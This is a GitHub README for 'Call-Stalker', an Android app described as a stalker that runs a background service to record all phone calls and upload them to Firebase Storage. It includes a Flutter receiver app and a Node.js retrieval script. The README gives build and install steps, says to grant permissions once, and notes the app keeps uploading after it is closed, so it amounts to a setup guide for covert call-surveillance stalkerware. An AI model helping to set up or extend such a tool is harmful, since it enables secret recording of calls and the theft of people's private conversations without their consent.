/Call-Stalker

A Call Stalker which runs a Service to save all call recordings to Firebase Storage from Client Side...

Primary LanguageJavaMIT LicenseMIT

Call-Stalker πŸ“žπŸ“žπŸ“žπŸ“ž License: MIT

A Call Stalker which runs a Service to save all call recordings to Firebase Storage on Client Side...

Install 🧢🧢🧢🧢

  • All you need to do is to create a firebase project, and add google-services.json file in app module directory.

      server/app/***
    
  • And Generate a Private Key ( json file ) for local Retrieve and add it in below path.

      localRetrieve/***
    

    Note : Go to this link for Private Key in Firebase , change YOUR_PROJECT_NAME to your project name in link.

How to πŸ’‘πŸ’‘πŸ’‘πŸ’‘

  • Build the application and install it with below commands .

      > cd server && gradlew installDebug 
  • If you have Android Studio you don't need to follow above thing, You know what to do .

  • After Installing it just Launch it once and grant permissions which it asked for .

  • And that's it , it will do it's things you can even close the app no issues .

  • You can check your firebase storage console for audio files , which will be periodically uploaded by the application .

  • Retrieve Through Application πŸƒπŸƒπŸƒπŸƒ


    • In Order to access audio files, a reciever application is builded with flutter .

      • Before Installing you need to configure firebase which you used above, for this refer this .

      • Run the below command to install it .

          flutter clean && flutter packages get && flutter run
  • Retrieve Localy πŸ’£πŸ’£πŸ’£πŸ’£


    • You can retireve it locally by using NodeJS with firebase-admin Library , You can get it with npm or yarn .

      • Run the below commands to download files .

        • Change Directory .

            > cd localRetrieve
        • Install Dependencies .

          • yarn

              > yarn 
          • npm

              > npm install
        • Run

          • yarn

              > yarn start
          • npm

              > npm start
      • You can find the audio files in files folder .

          localRetrieve/files/***
        
  • Android Application check for internet connection and uploads the necessary audio files using Thread Pool .

License πŸ““πŸ““πŸ““πŸ““

  MIT License

  Copyright (c) 2020 Raja Ravi Prakash

  Permission is hereby granted, free of charge, to any person obtaining a copy
  of this software and associated documentation files (the "Software"), to deal
  in the Software without restriction, including without limitation the rights
  to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
  copies of the Software, and to permit persons to whom the Software is
  furnished to do so, subject to the following conditions:

  The above copyright notice and this permission notice shall be included in all
  copies or substantial portions of the Software.

  THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
  IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
  FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
  AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
  LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
  OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
  SOFTWARE.